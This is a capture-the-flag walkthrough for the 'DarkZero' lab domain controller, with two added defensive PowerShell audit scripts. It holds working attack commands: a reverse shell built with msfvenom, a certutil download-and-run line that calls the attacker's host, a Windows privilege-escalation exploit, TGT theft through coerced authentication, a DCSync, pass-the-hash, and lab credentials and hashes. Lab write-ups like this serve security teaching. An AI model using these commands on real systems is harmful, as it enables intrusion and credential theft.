Credentials
As is common in real-life pentests, you will start the DarkZero box with credentials for the following account:
john.w:RFulUtONCOL!
Enum
$ export IP=10.129.148.173
$ rustscan --ulimit 10000 -a $IP -- -sCTV -Pn
[~] Automatically increasing ulimit value to 10000.
Open 10.129.148.173:139
Open 10.129.148.173:135
Open 10.129.148.173:88
Open 10.129.148.173:53
Open 10.129.148.173:464
Open 10.129.148.173:445
Open 10.129.148.173:389
Open 10.129.148.173:636
Open 10.129.148.173:593
Open 10.129.148.173:1433
Open 10.129.148.173:2179
Open 10.129.148.173:5985
Open 10.129.148.173:9389
Open 10.129.148.173:49664
Open 10.129.148.173:49667
Open 10.129.148.173:49670
Open 10.129.148.173:49671
Open 10.129.148.173:49891
Open 10.129.148.173:49911
Open 10.129.148.173:52038
Open 10.129.148.173:62939
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2025-10-05 21:08:34Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Issuer: commonName=darkzero-DC01-CA/domainComponent=darkzero
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-07-29T11:40:00
| Not valid after: 2026-07-29T11:40:00
| MD5: ce57:1ac8:da76:eb62:efe8:4e85:045b:d440
| SHA-1: 603a:f638:aabb:7eaa:1bdb:4256:5869:4de2:98b6:570c
| -----BEGIN CERTIFICATE-----
|_-----END CERTIFICATE-----
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Issuer: commonName=darkzero-DC01-CA/domainComponent=darkzero
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-07-29T11:40:00
| Not valid after: 2026-07-29T11:40:00
| MD5: ce57:1ac8:da76:eb62:efe8:4e85:045b:d440
| SHA-1: 603a:f638:aabb:7eaa:1bdb:4256:5869:4de2:98b6:570c
| -----BEGIN CERTIFICATE-----
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
1433/tcp open ms-sql-s syn-ack Microsoft SQL Server 2022 16.00.1000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-05T20:51:31
| Not valid after: 2055-10-05T20:51:31
| MD5: d5fe:099b:2073:bc9e:3616:61b2:9f97:0499
| SHA-1: 565c:01d3:971a:d70a:1c15:8da2:1ab8:7c37:c272:6838
| -----BEGIN CERTIFICATE-----
|_-----END CERTIFICATE-----
| ms-sql-ntlm-info:
| 10.129.148.173:1433:
| Target_Name: darkzero
| NetBIOS_Domain_Name: darkzero
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: darkzero.htb
| DNS_Computer_Name: DC01.darkzero.htb
| DNS_Tree_Name: darkzero.htb
|_ Product_Version: 10.0.26100
|_ssl-date: 2025-10-05T21:10:06+00:00; +7h00m00s from scanner time.
| ms-sql-info:
| 10.129.148.173:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
2179/tcp open vmrdp? syn-ack
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49670/tcp open msrpc syn-ack Microsoft Windows RPC
49671/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49891/tcp open msrpc syn-ack Microsoft Windows RPC
49911/tcp open msrpc syn-ack Microsoft Windows RPC
52038/tcp open msrpc syn-ack Microsoft Windows RPC
62939/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 28213/tcp): CLEAN (Timeout)
| Check 2 (port 39889/tcp): CLEAN (Timeout)
| Check 3 (port 12197/udp): CLEAN (Timeout)
| Check 4 (port 51917/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
- Update /etc/hosts
- Fix time skew
$ echo "$IP darkzero.htb DC01.darkzero.htb" | sudo tee -a /etc/hosts
10.129.148.173 darkzero.htb DC01.darkzero.htb
$ sudo ntpdate $IP
- LDAP enumeration reveals dc02.darkzero.ext
$ nxc ldap $IP -u john.w -p 'RFulUtONCOL!' --dc-list
LDAP 10.129.148.173 389 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb) (signing:Enforced) (channel binding:When Supported)
LDAP 10.129.148.173 389 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
LDAP 10.129.148.173 389 DC01 DC01.darkzero.htb = 172.16.20.1
LDAP 10.129.148.173 389 DC01 [+] Found DC in trusted domain: dc02.darkzero.ext
LDAP 10.129.148.173 389 DC01 darkzero.ext -> Bidirectional -> Forest Transitive, Cross Organization Enable TGT Delegation
LDAP 10.129.148.173 389 DC01 dc02.darkzero.ext = 172.16.20.2
$ echo "$IP dc02.darkzero.ext" | sudo tee -a /etc/hosts
- mssql is running on port 1433, so let's try the credentials we were given
- nxc mssql modules offer some convenient commands
$ nxc mssql -L
LOW PRIVILEGE MODULES
[*] enable_cmdshell Enable or disable xp_cmdshell in MSSQL Server
[*] enum_impersonate Enumerate users with impersonation privileges
[*] enum_links Enumerate linked SQL Servers and their login configurations.
[*] enum_logins Enumerate SQL Server logins (SQL, Domain, Local users)
[*] exec_on_link Execute commands on a SQL Server linked server
[*] link_enable_cmdshell Enable or disable xp_cmdshell on a linked MSSQL server
[*] link_xpcmd Run xp_cmdshell commands on a linked SQL server
[*] mssql_coerce Execute arbitrary SQL commands on the target MSSQL server
[*] mssql_priv Enumerate and exploit MSSQL privileges
HIGH PRIVILEGE MODULES (requires admin privs)
[*] empire_exec Uses Empire`s RESTful API to generate a launcher for the specified listener and executes it
[*] met_inject Downloads the Meterpreter stager and injects it into memory
[*] nanodump Get lsass dump using nanodump and parse the result with pypykatz
[*] test_connection Pings a host
[*] web_delivery Kicks off a Metasploit Payload using the exploit/multi/script/web_delivery module
$ nxc mssql $IP -u john.w -p 'RFulUtONCOL!'
MSSQL 10.129.148.173 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.129.148.173 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
- Credentials confirmed, so let's enumerate some more about the configuration
$ nxc mssql $IP -u john.w -p 'RFulUtONCOL!' -M enum_logins
MSSQL 10.129.148.173 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.129.148.173 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
ENUM_LOGINS 10.129.148.173 1433 DC01 [*] Enumerated logins
ENUM_LOGINS 10.129.148.173 1433 DC01 Login Name Type Status
ENUM_LOGINS 10.129.148.173 1433 DC01 ---------- ---- ------
ENUM_LOGINS 10.129.148.173 1433 DC01 darkzero\john.w Domain User ENABLED
ENUM_LOGINS 10.129.148.173 1433 DC01 sa SQL User DISABLED
ENUM_LOGINS 10.129.148.173 1433 DC01 darkzero\Domain Users Windows Group ENABLED
$ nxc mssql $IP -u john.w -p 'RFulUtONCOL!' -M enum_links
MSSQL 10.129.148.173 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.129.148.173 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
ENUM_LINKS 10.129.148.173 1433 DC01 [+] Linked servers found:
ENUM_LINKS 10.129.148.173 1433 DC01 [*] - DC01
ENUM_LINKS 10.129.148.173 1433 DC01 [*] - DC02.darkzero.ext
- Once again we see the cross-link with DC02.darkzero.ext
- Testing DC01, we cannot enable xp_cmdshell
- We can attempt to use DC02.darkzero.ext instead and actually get results returned back
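What enum_links is surfacing, seen from the administrator's side: the link_* modules only work because the link has RPC Out enabled and maps the calling login to a fixed, privileged remote login. The following audit script is an added example (not part of the writeup or of nxc) that lists every linked server with its login mappings and flags those two conditions; it assumes the SqlServer PowerShell module and a login that can read server metadata.

```powershell
# Added audit script, not part of the writeup or of nxc. Run against the instance that
# hosts the link (DC01 here). Assumes the SqlServer module (Invoke-Sqlcmd); the
# -TrustServerCertificate switch is needed because the instance presents a self-signed
# certificate (SSL_Self_Signed_Fallback in the scan above).
function Get-LinkedServerExposure {
    param([Parameter(Mandatory)] [string] $ServerInstance)

    # One row per (linked server, login mapping). In sys.linked_logins a row with
    # local_principal_id = 0 applies to every login without a specific mapping, and
    # uses_self_credential = 0 with a remote_name means "connect as that fixed login".
    $query = @'
SELECT s.name AS linked_server, s.data_source, s.is_rpc_out_enabled,
       ISNULL(p.name, '<all other logins>') AS local_login,
       ll.uses_self_credential, ll.remote_name
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS p ON p.principal_id = ll.local_principal_id
WHERE s.is_linked = 1;
'@

    $rows = Invoke-Sqlcmd -ServerInstance $ServerInstance -Query $query -TrustServerCertificate

    foreach ($r in $rows) {
        $issues = @()
        # NULL columns come back as DBNull, which PowerShell treats as truthy; normalise.
        $remote = if ($r.remote_name -is [System.DBNull]) { $null } else { $r.remote_name }

        if ($r.is_rpc_out_enabled -eq $true) {
            # RPC Out is what allows "EXEC ... AT [link]"; enabling xp_cmdshell and
            # running commands through the link depends on it.
            $issues += 'RPC Out enabled'
        }
        if ($r.uses_self_credential -eq $false -and $remote) {
            # Every local login covered by this mapping reaches the remote server as one
            # fixed account, so that account's remote privileges become everyone's.
            $issues += "fixed remote login '$remote'"
        }
        if ($r.local_login -eq '<all other logins>' -and $issues.Count -gt 0) {
            $issues += 'mapping applies to all logins, including unprivileged domain users'
        }
        [pscustomobject]@{
            LinkedServer = $r.linked_server
            DataSource   = $r.data_source
            LocalLogin   = $r.local_login
            Issues       = ($issues -join '; ')
        }
    }
}

# Example: Get-LinkedServerExposure -ServerInstance 'DC01.darkzero.htb' | Format-Table -AutoSize
```

A link that shows both "RPC Out enabled" and a fixed remote login for all logins is the configuration to remediate: map logins individually, use the caller's own credentials, or disable RPC Out where the link is only used for queries.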
$ nxc mssql -M link_enable_cmdshell --options
Defines the options for enabling or disabling xp_cmdshell on the linked server.
ACTION Specifies whether to enable or disable:
- enable (default)
- disable
LINKED_SERVER The name of the linked SQL server to target.
$ nxc mssql $IP -u john.w -p 'RFulUtONCOL!' -M link_enable_cmdshell -o LINKED_SERVER=DC02.darkzero.ext ACTION=enable
MSSQL 10.129.148.173 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.129.148.173 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
LINK_ENA... 10.129.148.173 1433 DC01 [*] Enabling xp_cmdshell on DC02.darkzero.ext. Current value: False
LINK_ENA... 10.129.148.173 1433 DC01 [+] xp_cmdshell enabled on DC02.darkzero.ext
$ nxc mssql -M link_xpcmd --options
Defines the options for running xp_cmdshell commands on a linked server.
LINKED_SERVER The name of the linked SQL server to target.
CMD The command to run via xp_cmdshell.
$ nxc mssql $IP -u john.w -p 'RFulUtONCOL!' -M link_xpcmd -o LINKED_SERVER=DC02.darkzero.ext CMD="whoami"
MSSQL 10.129.148.173 1433 DC01 [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
MSSQL 10.129.148.173 1433 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
LINK_XPCMD 10.129.148.173 1433 DC01 [*] Running command on DC02.darkzero.ext: whoami
LINK_XPCMD 10.129.148.173 1433 DC01 [+] Executed command via linked server
LINK_XPCMD 10.129.148.173 1433 DC01 darkzero-ext\svc_sql
User (Intended)
Placeholder
Will update after I can run through again
User (Unintended)
- Now that we have enabled xp_cmdshell we will attempt to start a meterpreter session
- Use https://www.revshells.com/ to generate msfvenom and msfconsole commands
- We will also start an HTTP server via python to transfer our file to the server
- Make sure to update your IP & PORT in all cases
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=6969 -f exe -o shell.exe
$ msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.10.10; set lport 6969; exploit"
$ python3 -m http.server 7070
- Now, in a separate terminal, we will download and trigger our revshell payload via nxc a final time, with our msfconsole listener ready
$ nxc mssql $IP -u john.w -p 'RFulUtONCOL!' -M link_xpcmd -o LINKED_SERVER=DC02.darkzero.ext CMD="certutil -urlcache -f http://10.10.10.10:7070/shell.exe %TEMP%/shell.exe && start %TEMP%/shell.exe"
- Catch the session in msfconsole
- Background the session
- Configure and run the exploit suggester
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf exploit(multi/handler) > set SESSION 1
msf exploit(multi/handler) > set validatearch false
msf exploit(multi/handler) > run
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/appxsvc_hard_link_privesc Yes The service is running, but could not be validated.
2 exploit/windows/local/bypassuac_dotnet_profiler Yes The target appears to be vulnerable.
3 exploit/windows/local/bypassuac_sdclt Yes The target appears to be vulnerable.
4 exploit/windows/local/cve_2022_21882_win32k Yes The service is running, but could not be validated. May be vulnerable, but exploit not tested on Windows Server 2022
5 exploit/windows/local/cve_2022_21999_spoolfool_privesc Yes The target appears to be vulnerable.
6 exploit/windows/local/cve_2023_28252_clfs_driver Yes The target appears to be vulnerable. The target is running windows version: 10.0.20348.0 which has a vulnerable version of clfs.sys installed by default
7 exploit/windows/local/cve_2024_30085_cloud_files Yes The target appears to be vulnerable.
8 exploit/windows/local/cve_2024_30088_authz_basep Yes The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
9 exploit/windows/local/cve_2024_35250_ks_driver Yes The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2022
10 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.
11 exploit/windows/local/registry_persistence Yes The target is vulnerable.
- Only #8 did the trick
msf post(multi/recon/local_exploit_suggester) > use exploit/windows/local/cve_2024_30088_authz_basep
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/cve_2024_30088_authz_basep) > options
Module options (exploit/windows/local/cve_2024_30088_authz_basep):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.50.251 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x64
View the full module info with the info, or info -d command.
msf exploit(windows/local/cve_2024_30088_authz_basep) > set SESSION 1
SESSION => 1
msf exploit(windows/local/cve_2024_30088_authz_basep) > set LHOST tun0
LHOST => 10.10.15.40
msf exploit(windows/local/cve_2024_30088_authz_basep) > set LPORT 9696
LPORT => 9696
msf exploit(windows/local/cve_2024_30088_authz_basep) > run
[*] Started reverse TCP handler on 10.10.10.10:9696
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
[*] Reflectively injecting the DLL into 1936...
[+] The exploit was successful, reading SYSTEM token from memory...
[+] Successfully stole winlogon handle: 992
[+] Successfully retrieved winlogon pid: 612
[*] Sending stage (203846 bytes) to 10.129.148.173
[*] Meterpreter session 2 opened (10.10.10.10:9696 -> 10.129.148.173:54531)
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > dir "C:\Users\Administrator\Desktop"
Listing: C:\Users\Administrator\Desktop
=======================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2025-07-29 08:58:25 -0400 desktop.ini
100666/rw-rw-rw- 34 fil 2025-10-04 00:00:00 -0400 user.txt
meterpreter > cat "C:\Users\Administrator\Desktop\user.txt"
Root
- Since we have observed several mentions of DC01 and DC02 being linked together, let's check for unconstrained delegation
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS > Get-ADComputer -Filter {TrustedForDelegation -eq $true}
DistinguishedName : CN=DC02,OU=Domain Controllers,DC=darkzero,DC=ext
DNSHostName : DC02.darkzero.ext
Enabled : True
Name : DC02
ObjectClass : computer
ObjectGUID : f85520d0-db6e-4a92-9ebc-f01d6d4cc268
SamAccountName : DC02$
SID : S-1-5-21-1969715525-31638512-2552845157-1000
UserPrincipalName :
- Seems we can carry out the attack to steal DC01's TGT when it authenticates with DC02
- Need to use Rubeus with some sort of coercion tactic; I will use the aptly named Coercer
- Rubeus monitors for new TGTs, and Coercer will trigger the authentication that delivers one
C:\Users\Administrator\Desktop> Rubeus.exe monitor /interval:5
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: TGT Monitoring
[*] Monitoring every 5 seconds for new TGTs
*snip*
- Now we need to trigger some sort of coercion
$ coercer coerce -u john.w -p RFulUtONCOL! -d darkzero.htb -l DC02.darkzero.ext -t DC01.darkzero.htb
______
/ ____/___ ___ _____________ _____
/ / / __ \/ _ \/ ___/ ___/ _ \/ ___/
/ /___/ /_/ / __/ / / /__/ __/ / v2.4.3
\____/\____/\___/_/ \___/\___/_/ by @podalirius_
[info] Starting coerce mode
[info] Scanning target DC01.darkzero.htb
[*] DCERPC portmapper discovered ports: 49664,49665,49666,49667,49891,49669,49670,52038,49876,49911,62939
[+] SMB named pipe '\PIPE\efsrpc' is accessible!
[+] Successful bind to interface (df1941c5-fe89-4e79-bf10-463657acf44d, 1.0)!
[+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\DC02.darkzero.ext\6UX0Xlfo\file.txt\x00')
Continue (C) | Skip this function (S) | Stop exploitation (X) ? X
[+] All done! Bye Bye!
- We will see a new ticket in Rubeus for DC01
User : DC01$@DARKZERO.HTB
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
*snip*
- We now need to Pass The Ticket (PTT)
C:\Users\Administrator\Desktop> Rubeus.exe ptt /ticket:doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDYT2hllhY2nKW7Tagbq2GFEUrofcHITWZfVcqzIW2ZwiYY4sfQg0f+B4BPR+c+QMdR0YjsZz5k279wuTY0CSSezPDgCbVeUDC8ZS4cuXXY62Z1BW3ENpNBv4MDZCwYD3DSeH47GoiieZNhdU3ayfOwJGjLpQSV1FuC7pG36UofUVLP4OycRMlDh+O8s4/z3UXm5fR+2r+F6llO7Ly/tzBfc3EOM3cpGYXygRT2+hKZCoWhh6FbAL5JgF7XXWOj1pNUGs2E3/M+pzRgIs8voy35vf6k3s/do57ASUCN5DyezpLyJh0bl6OWiXs1WY1GUwp8EvVeRcrCVFTLuSWkHfUapWmaoDFz6/hclYtbJ02Iqm8G6y+EJA42EisOSVgJZ3bVI7sG1nd4KxPZ3HuX1LAV9UpUt4/0Hn+23hitYdLpz1hyD4A5lkwec6fAoNk0fnFmAmMS0dr+gU3L7udiF26dqse/ZWz+sfSx7jP7L26/2vWK54PSYQBf3u+cR3CCnBjPGKZX8ForjatdJ8PZp23ggfRw4l0h0ifPiBeW9h/4ZhC8zGoFEOD81lr2eprkBpw3J/O+LiEI4ziD9/rQFoIHam4vmYdOAPjLQaKxPtuR1wNhlcc5mZcYI6VpnZ7hx7RXYmCeWdx0j0LcZNTHGCQiAxqQGHYx2K+H+O0iWXP2HzVzPqg07C15LCYIoKSBTTT06IXRDUJj6EVukLuBmeBkqsZcR2CVfUK80k2Xddzw7sTTDp1XODTS+/k1uhW8ZrWTXtkxd+/Sk2UA09FTRbzh0OdlfBzWnenQ37Mhun0plQUJhuNOtXVw45Xnxctlr1HQt+geG9c2DKsXX62rVjG8zQ1Zq0YeOhYid14rUx2tFJ7YQc516/JC0AwMIwMtgU6upvkPhcwvTxXyZSXmc00GsirtpfDnanVxBYwXvwVh7VNFKRj8z85t51xncFMl7+yvjWdti5vvAdUvxfXOi0Ltcsy2lUYCyg6EmIcVMIEvkRe0hIpmC6FcTkN87LDbYiRLHn4TmQWIhjVXltmASZMAi3Kttf2H+iVNCtGeN+V0Q8TTUzBb2ymL6GVya5zI7cXWiQxAnzjTZ/izAUhUlW7gcbWEWAc1Lj4BTH8GFXDII+xrOXlXr4JbnvNEenVKjK/Zjhto3P9lf0T2Rod7jbsIhhyk2ZaRqfj6pSJLw2xqNsgI/z4xWCu5sN+Wrp5pLOKE2jf6bI+ylSAqgSljWezotIast8OpsVJpgUCe02QMsEFaG3hYn7BxG4/88CBKa6fQMRFFBOT//WjwCaFbdvkv+Vv6OcVWsHvdszS/N2hvMCVC2IQWbEMAh2YRtUt/ZpQTXFuOWbaglCoKX3LirV/vbULvAELgov3lW+dhHpIBmZ3NrN7yGK8kW/e9I2eIDrcjP3mN6ByOSlQXW950Thyuxo9oAvE99o4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagKzApoAMCARKhIgQgozBiQ6SA6pdJ7dH0lAoN9WvzhlHXvK21X9k4ef35bP6hDhsMREFSS1pFUk8uSFRCohIwEKADAgEBoQkwBxsFREMwMSSjBwMFAGChAAClERgPMjAyNTEwMDYwNjIwMjVaphEYDzIwMjUxMDA2MTYyMDI1WqcRGA8yMDI1MTAxMjIwNDk1MlqoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI=
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Import Ticket
[+] Ticket successfully imported!
- Now we can DCSync for the admin hash via kiwi or mimikatz
meterpreter > kiwi_cmd "lsadump::dcsync /domain:darkzero.htb /user:Administrator"
[DC] 'darkzero.htb' will be the domain
[DC] 'DC01.darkzero.htb' will be the DC server
[DC] 'Administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 9/10/2025 9:42:44 AM
Object Security ID : S-1-5-21-1152179935-589108180-1989892463-500
Object Relative ID : 500
Credentials:
Hash NTLM: 5917507bdf2ef2c2b0a869a1cba40726
*snip*
- Connect via evil-winrm
$ evil-winrm -i $IP -u administrator -H '5917507bdf2ef2c2b0a869a1cba40726'
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir ../Desktop
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/4/2025 1:50 PM 34 root.txt
-ar--- 10/4/2025 1:50 PM 34 user.txt
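The Root chain depended on two directory settings: DC02 being trusted for unconstrained delegation (the Get-ADComputer check above) and the darkzero.ext trust carrying the "Enable TGT Delegation" flag that nxc printed during enumeration. The script below is an added audit example (not part of the writeup) that reports both from the defender's side; it assumes the ActiveDirectory RSAT module, and the -Server parameter and the netdom command in its output are the standard ones, not something from the page.

```powershell
# Added audit script, not part of the writeup. Lists accounts trusted for unconstrained
# delegation (computers and users, DC vs. non-DC) and trusts with TGT delegation enabled.
# Assumes the ActiveDirectory RSAT module; -Server is an optional DC to query.
function Get-DelegationExposure {
    param([string] $Server)

    $ad = @{}
    if ($Server) { $ad['Server'] = $Server }

    # userAccountControl bit 0x80000 (524288) is TRUSTED_FOR_DELEGATION, i.e. unconstrained.
    # 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule, so the DC does the filtering.
    $uacFilter = '(userAccountControl:1.2.840.113556.1.4.803:=524288)'
    $accounts = @(Get-ADComputer -LDAPFilter $uacFilter -Properties primaryGroupID @ad) +
                @(Get-ADUser -LDAPFilter $uacFilter -Properties primaryGroupID @ad)

    foreach ($a in $accounts) {
        # primaryGroupID 516 = Domain Controllers. DCs carry the flag by design; the risk is
        # any path that lets a low-privileged user make another DC authenticate to them.
        if ($a.primaryGroupID -eq 516) {
            $detail = 'domain controller (expected); TGTs forwarded here are exposed if it is compromised'
        } else {
            $detail = 'non-DC with unconstrained delegation: move to constrained/RBCD or clear the flag'
        }
        [pscustomobject]@{ Finding = 'UnconstrainedDelegation'; Object = $a.SamAccountName; Detail = $detail }
    }

    # trustAttributes bit 0x800 = TRUST_ATTRIBUTE_CROSS_ORGANIZATION_ENABLE_TGT_DELEGATION.
    # With it set, a forwardable TGT from this forest may be delegated to unconstrained hosts in
    # the trusted forest, which is what allowed DC02 to receive DC01's TGT in the writeup.
    foreach ($t in Get-ADTrust -Filter * @ad) {
        if (($t.TrustAttributes -band 0x800) -ne 0) {
            $detail = "TGT delegation ENABLED across trust ($($t.Direction), forest-transitive=$($t.ForestTransitive)); " +
                      "disable with 'netdom trust <trusting-domain> /domain:<trusted-domain> /EnableTgtDelegation:No' unless required"
        } else {
            $detail = 'TGT delegation disabled across trust'
        }
        [pscustomobject]@{ Finding = 'TrustTgtDelegation'; Object = $t.Name; Detail = $detail }
    }
}

# Example: Get-DelegationExposure -Server 'DC01.darkzero.htb' | Format-Table -Wrap -AutoSize
```

Run it in both forests: the trust flag that matters for a given TGT is the one on the side whose tickets are being forwarded.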